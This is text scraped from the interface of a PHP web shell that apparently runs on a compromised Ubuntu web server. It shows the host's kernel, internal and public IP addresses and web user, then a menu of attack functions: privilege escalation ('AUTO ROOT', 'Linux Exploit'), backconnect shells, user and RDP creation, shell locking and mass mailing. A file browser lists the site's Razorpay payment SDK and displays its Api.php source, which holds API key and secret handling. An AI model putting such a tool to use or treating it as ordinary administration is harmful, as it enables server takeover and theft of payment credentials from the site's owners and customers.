Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.138.134.149
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
pget /
razorpay /
razorpay-php /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Errors
[ DIR ]
drwxr-xr-x
Api.php
1.71
KB
-rwxr-xr-x
ArrayableInterface.php
190
B
-rwxr-xr-x
Card.php
196
B
-rwxr-xr-x
Collection.php
324
B
-rwxr-xr-x
Customer.php
661
B
-rwxr-xr-x
Entity.php
4.65
KB
-rwxr-xr-x
Invoice.php
414
B
-rwxr-xr-x
Order.php
594
B
-rwxr-xr-x
Payment.php
1014
B
-rwxr-xr-x
Refund.php
410
B
-rwxr-xr-x
Request.php
5.51
KB
-rwxr-xr-x
Resource.php
1.09
KB
-rwxr-xr-x
Token.php
707
B
-rwxr-xr-x
Utility.php
1.71
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Api.php
<?php namespace Razorpay\Api; class Api { protected static $baseUrl = 'https://api.razorpay.com/v1/'; protected static $key = null; protected static $secret = null; /* * App info is to store the Plugin/integration * information */ public static $appsDetails = array(); const VERSION = '1.2.9'; /** * @param string $key * @param string $secret */ public function __construct($key, $secret) { self::$key = $key; self::$secret = $secret; } /* * Set Headers * */ public function setHeader($header, $value) { Request::addHeader($header, $value); } public function setAppDetails($title, $version = null) { $app = array( 'title' => $title, 'version' => $version ); array_push(self::$appsDetails, $app); } public function getAppsDetails() { return self::$appsDetails; } public function setBaseUrl($baseUrl) { self::$baseUrl = $baseUrl; } /** * @param string $name * @return mixed */ public function __get($name) { $className = __NAMESPACE__.'\\'.ucwords($name); $entity = new $className(); return $entity; } public static function getBaseUrl() { return self::$baseUrl; } public static function getKey() { return self::$key; } public static function getSecret() { return self::$secret; } public static function getFullUrl($relativeUrl) { return self::getBaseUrl() . $relativeUrl; } }
Close